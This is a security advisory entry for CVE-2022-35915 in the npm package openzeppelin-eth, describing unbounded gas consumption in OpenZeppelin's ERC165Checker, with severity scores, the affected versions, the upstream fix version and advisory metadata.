CVE-2022-35915 – openzeppelin-eth

Package

Manager: npm
Name: openzeppelin-eth
Vulnerable Version: >=2.0.0 <=2.2.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

EPSS: 0.004 pctl0.59912

Details

OpenZeppelin Contracts ERC165Checker unbounded gas consumption ### Impact The target contract of an EIP-165 `supportsInterface` query can cause unbounded gas consumption by returning a lot of data, while it is generally assumed that this operation has a bounded cost. ### Patches The issue has been fixed in v4.7.2. ### References https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3587 ### For more information If you have any questions or comments about this advisory, or need assistance deploying a fix, email us at [security@openzeppelin.com](mailto:security@openzeppelin.com).

Metadata

Created: 2022-08-14T00:23:34Z
Modified: 2022-08-14T00:23:34Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-7grf-83vw-6f5x/GHSA-7grf-83vw-6f5x.json
CWE IDs: ["CWE-400", "CWE-770"]
Alternative ID: GHSA-7grf-83vw-6f5x
Finding: F067
Auto approve: 1